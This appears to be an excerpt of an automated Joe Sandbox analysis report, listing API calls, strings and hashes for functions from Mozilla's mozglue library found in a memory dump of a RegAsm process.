                                                                              • Part of subcall function 6CC8B8B0: free.MOZGLUE(00000000,?,?,80000000), ref: 6CC8B94A
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6CC7E864
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC7E883
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: ExclusiveLockfree$memset$AcquireCurrentReleaseThreadXbad_function_call@std@@$?vprint@PrintfTarget@mozilla@@__stdio_common_vsprintfmemcpy
                                                                            • String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
                                                                            • API String ID: 2698983630-53385798
                                                                            • Opcode ID: b1e4d4191256c55da55263a9f6882a40acc5fc1006c964abaef0534952ca83e2
                                                                            • Instruction ID: 4de75522b9607cb6719b6e3a0f9dd521e6e79342945ae7a31e9555a065a2039c
                                                                            • Opcode Fuzzy Hash: b1e4d4191256c55da55263a9f6882a40acc5fc1006c964abaef0534952ca83e2
                                                                            • Instruction Fuzzy Hash: 8D02AE766003059FCB10CF68C484AAAB7F5FF89308F14452DE85A97B51EB34E945CFA1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: memcpystrlen
                                                                            • String ID: (pre-xul)$data$name$schema
                                                                            • API String ID: 3412268980-999448898
                                                                            • Opcode ID: 39fb32376040c5170ac8d800e7e73b0680ce11a4aa51ee9a59cfc14c6f763220
                                                                            • Instruction ID: 4d56c689506c449e9a612656d41bc76c7497c97c30b12ef846419548ae7a4176
                                                                            • Opcode Fuzzy Hash: 39fb32376040c5170ac8d800e7e73b0680ce11a4aa51ee9a59cfc14c6f763220
                                                                            • Instruction Fuzzy Hash: 67E18FB1A043418FC714CF68884065BFBE9FBC5354F14892DE899E7791EB70ED098B92
                                                                            APIs
                                                                            • EnterCriticalSection.KERNEL32(6CCBE784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6CC6D1C5), ref: 6CC5D4F2
                                                                            • LeaveCriticalSection.KERNEL32(6CCBE784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6CC6D1C5), ref: 6CC5D50B
                                                                              • Part of subcall function 6CC3CFE0: EnterCriticalSection.KERNEL32(6CCBE784), ref: 6CC3CFF6
                                                                              • Part of subcall function 6CC3CFE0: LeaveCriticalSection.KERNEL32(6CCBE784), ref: 6CC3D026
                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6CC6D1C5), ref: 6CC5D52E
                                                                            • EnterCriticalSection.KERNEL32(6CCBE7DC), ref: 6CC5D690
                                                                            • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6CC5D6A6
                                                                            • LeaveCriticalSection.KERNEL32(6CCBE7DC), ref: 6CC5D712
                                                                            • LeaveCriticalSection.KERNEL32(6CCBE784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6CC6D1C5), ref: 6CC5D751
                                                                            • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6CC5D7EA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
                                                                            • String ID: : (malloc) Error initializing arena$<jemalloc>
                                                                            • API String ID: 2690322072-3894294050
                                                                            • Opcode ID: e12a021372435bc0d4eb110af38802f9dff84df59c5e61e4c8fbc90647dea768
                                                                            • Instruction ID: 3a1904b411e8ecb7703ff20645f2cf63c177bf90dee054111eecc66439d545a9
                                                                            • Opcode Fuzzy Hash: e12a021372435bc0d4eb110af38802f9dff84df59c5e61e4c8fbc90647dea768
                                                                            • Instruction Fuzzy Hash: 68910271A047418FD714CF69C29022AB7F1FB89744F54892EE45AD7B84FB30E861CB8A
                                                                            APIs
                                                                            • Sleep.KERNEL32(000007D0), ref: 6CC94EFF
                                                                            • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CC94F2E
                                                                            • moz_xmalloc.MOZGLUE ref: 6CC94F52
                                                                            • memset.VCRUNTIME140(00000000,00000000), ref: 6CC94F62
                                                                            • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CC952B2
                                                                            • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CC952E6
                                                                            • Sleep.KERNEL32(00000010), ref: 6CC95481
                                                                            • free.MOZGLUE(?), ref: 6CC95498
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: floor$Sleep$freememsetmoz_xmalloc
                                                                            • String ID: (
                                                                            • API String ID: 4104871533-3887548279
                                                                            • Opcode ID: 204183b29151d107b00e1fa882b610387a87ab6b0e9d0cf3b0697dbc30ddd467
                                                                            • Instruction ID: bef3cfb0d40f4835ba05d26199991e5acd628ad4c6065d02491ebc1adfa071c2
                                                                            • Opcode Fuzzy Hash: 204183b29151d107b00e1fa882b610387a87ab6b0e9d0cf3b0697dbc30ddd467
                                                                            • Instruction Fuzzy Hash: 0FF1F375A18B008FC716CF78C85062BB7F9AFD6384F05872EF846A7651EB31D8468B81
                                                                            APIs
                                                                            • EnterCriticalSection.KERNEL32(6CCBE744), ref: 6CC47885
                                                                            • LeaveCriticalSection.KERNEL32(6CCBE744), ref: 6CC478A5
                                                                            • EnterCriticalSection.KERNEL32(6CCBE784), ref: 6CC478AD
                                                                            • LeaveCriticalSection.KERNEL32(6CCBE784), ref: 6CC478CD
                                                                            • EnterCriticalSection.KERNEL32(6CCBE7DC), ref: 6CC478D4
                                                                            • memset.VCRUNTIME140(?,00000000,00000158), ref: 6CC478E9
                                                                            • EnterCriticalSection.KERNEL32(00000000), ref: 6CC4795D
                                                                            • memset.VCRUNTIME140(?,00000000,00000160), ref: 6CC479BB
                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 6CC47BBC
                                                                            • memset.VCRUNTIME140(?,00000000,00000158), ref: 6CC47C82
                                                                            • LeaveCriticalSection.KERNEL32(6CCBE7DC), ref: 6CC47CD2
                                                                            • memset.VCRUNTIME140(00000000,00000000,00000450), ref: 6CC47DAF
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterLeavememset
                                                                            • String ID:
                                                                            • API String ID: 759993129-0
                                                                            • Opcode ID: c05e73d1087b6bae17bb023aafb1cac27e38c51ff75aaf9fc93aa02132971b2f
                                                                            • Instruction ID: de31c2ff16b41d6fbe935adb9dc5b39ea4c470711c546b6f19300ba7a1f42f6c
                                                                            • Opcode Fuzzy Hash: c05e73d1087b6bae17bb023aafb1cac27e38c51ff75aaf9fc93aa02132971b2f
                                                                            • Instruction Fuzzy Hash: D8023E71E0121A8FDB54CF59C984799B7B5FF88318F25C2AAD809A7751E730AE91CF80
                                                                            APIs
                                                                            • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6CC751DF
                                                                            • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6CC7529C
                                                                            • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,00000000), ref: 6CC752FF
                                                                            • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6CC7536D
                                                                            • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6CC753F7
                                                                              • Part of subcall function 6CC6AB89: EnterCriticalSection.KERNEL32(6CCBE370,?,?,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284), ref: 6CC6AB94
                                                                              • Part of subcall function 6CC6AB89: LeaveCriticalSection.KERNEL32(6CCBE370,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC6ABD1
                                                                            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_RECORD_OVERHEADS), ref: 6CC756C3
                                                                            • __Init_thread_footer.LIBCMT ref: 6CC756E0
                                                                            Strings
                                                                            • MOZ_PROFILER_RECORD_OVERHEADS, xrefs: 6CC756BE
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: BaseDurationPlatformSeconds@TimeUtils@mozilla@@$CriticalSection$EnterInit_thread_footerLeavegetenv
                                                                            • String ID: MOZ_PROFILER_RECORD_OVERHEADS
                                                                            • API String ID: 1227157289-345010206
                                                                            • Opcode ID: 0c38fbd5820da571e058bb01c79ab93d0f5b58dfd4fd1ef7188c45a07bad91a8
                                                                            • Instruction ID: 10cce13f1c5ce48694b254df641a6b32b60ef1b26413e96776dddeb07509c8ac
                                                                            • Opcode Fuzzy Hash: 0c38fbd5820da571e058bb01c79ab93d0f5b58dfd4fd1ef7188c45a07bad91a8
                                                                            • Instruction Fuzzy Hash: 55E19271914F45CAC722CF35885026BB7B5FF9B394F109B0EE8AB2A950EF30E4468751
                                                                            APIs
                                                                            • GetLastError.KERNEL32 ref: 6CC97046
                                                                            • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000), ref: 6CC97060
                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CC9707E
                                                                              • Part of subcall function 6CC481B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6CC481DE
                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CC97096
                                                                            • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CC9709C
                                                                            • LocalFree.KERNEL32(?), ref: 6CC970AA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: __acrt_iob_func$ErrorFormatFreeLastLocalMessage__stdio_common_vfprintffflush
                                                                            • String ID: ### ERROR: %s: %s$(null)
                                                                            • API String ID: 2989430195-1695379354
                                                                            • Opcode ID: 18d57eb4f3de29e0856464fe28bb92943cb975df8556b58ad2d8d51f5921caf6
                                                                            • Instruction ID: 8124e094ee603de008e810359ef376fae09ef820a0fb28981a9df2d671c5d74c
                                                                            • Opcode Fuzzy Hash: 18d57eb4f3de29e0856464fe28bb92943cb975df8556b58ad2d8d51f5921caf6
                                                                            • Instruction Fuzzy Hash: 5D01B9B1A00108AFDF00ABE4DC9ADAF7BBCEF49254F010435FA05E3241E6716914CBA5
                                                                            APIs
                                                                            • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6CC82C31
                                                                            • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6CC82C61
                                                                              • Part of subcall function 6CC34DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CC34E5A
                                                                              • Part of subcall function 6CC34DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6CC34E97
                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CC82C82
                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CC82E2D
                                                                              • Part of subcall function 6CC481B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6CC481DE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
                                                                            • String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
                                                                            • API String ID: 801438305-4149320968
                                                                            • Opcode ID: d385ce8aeefbdc44acded72305fb4ba73eb3d42deb6f7f9680d228b9c214f0c0
                                                                            • Instruction ID: 77f7c8d2a811920f5dbfdac0801bb89fbc501b3e29dd3f1148780d1efb9f4057
                                                                            • Opcode Fuzzy Hash: d385ce8aeefbdc44acded72305fb4ba73eb3d42deb6f7f9680d228b9c214f0c0
                                                                            • Instruction Fuzzy Hash: ED91E0B06097408FD724CF24C4A869FBBE1AFC9358F14491EE99A87751FB30D949CB52
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: __aulldiv__aullrem
                                                                            • String ID: -Infinity$NaN
                                                                            • API String ID: 3839614884-2141177498
                                                                            • Opcode ID: 88987848f3a063f64a5a10850f761dd4747f3cc86f78c739310f5c0f1aba7dd5
                                                                            • Instruction ID: ab6bdadffe1cd4a29a4aa2c99262c168c13e6353f6d973d07d4c9d313f69a4b5
                                                                            • Opcode Fuzzy Hash: 88987848f3a063f64a5a10850f761dd4747f3cc86f78c739310f5c0f1aba7dd5
                                                                            • Instruction Fuzzy Hash: 3AC1A131E04319CFDB14CFA9C89079EB7B6FF88714F144529D406ABB80EB71A949CB91
                                                                            APIs
                                                                              • Part of subcall function 6CC49B80: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,6CC9B92D), ref: 6CC49BC8
                                                                              • Part of subcall function 6CC49B80: __Init_thread_footer.LIBCMT ref: 6CC49BDB
                                                                            • rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6CC403D4,?), ref: 6CC9B955
                                                                            • NtQueryVirtualMemory.NTDLL ref: 6CC9B9A5
                                                                            • NtQueryVirtualMemory.NTDLL ref: 6CC9BA20
                                                                            • RtlNtStatusToDosError.NTDLL ref: 6CC9BA7B
                                                                            • RtlSetLastWin32Error.NTDLL(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6CC9BA81
                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6CC9BA86
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Error$LastMemoryQueryVirtual$InfoInit_thread_footerStatusSystemWin32rand_s
                                                                            • String ID:
                                                                            • API String ID: 1753913139-0
                                                                            • Opcode ID: 3c0721a34068e16de21f10f82da48cac9db6571cd9dc1a909f8d6d4efbb4e78d
                                                                            • Instruction ID: 298164241081a63215a8f88014077f3672320712cbe7e616001a6955ee484ac4
                                                                            • Opcode Fuzzy Hash: 3c0721a34068e16de21f10f82da48cac9db6571cd9dc1a909f8d6d4efbb4e78d
                                                                            • Instruction Fuzzy Hash: 3D515F71E01219EFDF24CFA9D994ADDB7B6AF88314F154129E901B7704EB30AD868B90
                                                                            APIs
                                                                              • Part of subcall function 6CC6FA80: GetCurrentThreadId.KERNEL32 ref: 6CC6FA8D
                                                                              • Part of subcall function 6CC6FA80: AcquireSRWLockExclusive.KERNEL32(6CCBF448), ref: 6CC6FA99
                                                                            • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6CC91563), ref: 6CC78BD5
                                                                            • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6CC91563), ref: 6CC78C3A
                                                                            • ReleaseSRWLockExclusive.KERNEL32(-00000018,?,?,?,?,?,?,?,?,?,?,?,6CC91563), ref: 6CC78C74
                                                                            • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,6CC91563), ref: 6CC78CBA
                                                                            • free.MOZGLUE(?), ref: 6CC78CCF
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: ExclusiveLockNow@Stamp@mozilla@@TimeV12@_free$AcquireCurrentReleaseThread
                                                                            • String ID:
                                                                            • API String ID: 2153970598-0
                                                                            • Opcode ID: b1d5c0fa925432108f5ca9dc53e2b7a9f15127c98f0a8fae8bedb1ce11857436
                                                                            • Instruction ID: c0d585bdce678feb24f3386adc40f584f1c39088f97c0c8fa341d8dca8ca1a3f
                                                                            • Opcode Fuzzy Hash: b1d5c0fa925432108f5ca9dc53e2b7a9f15127c98f0a8fae8bedb1ce11857436
                                                                            • Instruction Fuzzy Hash: CB718D75A14B008FD714CF29C480A5AB7F1FF99318F558A5EE9899B722F770E884CB41
                                                                            APIs
                                                                            • NtQueryVirtualMemory.NTDLL ref: 6CC3F2B4
                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 6CC3F2F0
                                                                            • NtQueryVirtualMemory.NTDLL ref: 6CC3F308
                                                                            • RtlNtStatusToDosError.NTDLL ref: 6CC3F36B
                                                                            • RtlSetLastWin32Error.NTDLL(00000000,00000000,000000FF,?,00000000,?,0000001C,?), ref: 6CC3F371
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMemoryQueryVirtual$AddressLastProcStatusWin32
                                                                            • String ID:
                                                                            • API String ID: 1171715205-0
                                                                            • Opcode ID: e79293dfd7489ec129475506178e5b8476a6904c26ff159ede1fb511f247a457
                                                                            • Instruction ID: 2cc22a683bdbbd06526de5443faea9543726e00d0518af7ce36bc2beec93f2a8
                                                                            • Opcode Fuzzy Hash: e79293dfd7489ec129475506178e5b8476a6904c26ff159ede1fb511f247a457
                                                                            • Instruction Fuzzy Hash: ED21F530B40319DFEB508A91ED54BEF76B8AB0435CF101669E5289A580F774988CC760
                                                                            APIs
                                                                            • memset.VCRUNTIME140(?,000000FF,?), ref: 6CCA86AE
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: memset
                                                                            • String ID:
                                                                            • API String ID: 2221118986-0
                                                                            APIs
                                                                            • memset.VCRUNTIME140(?,000000FF,?), ref: 6CCA8A4B
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: memset
                                                                            • String ID:
                                                                            • API String ID: 2221118986-0
                                                                            APIs
                                                                            • memset.VCRUNTIME140(?,000000FF,?), ref: 6CCA88F0
                                                                            • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6CCA925C
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: memset
                                                                            • String ID:
                                                                            • API String ID: 2221118986-0
                                                                            APIs
                                                                            • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CCA8E18
                                                                            • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6CCA925C
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
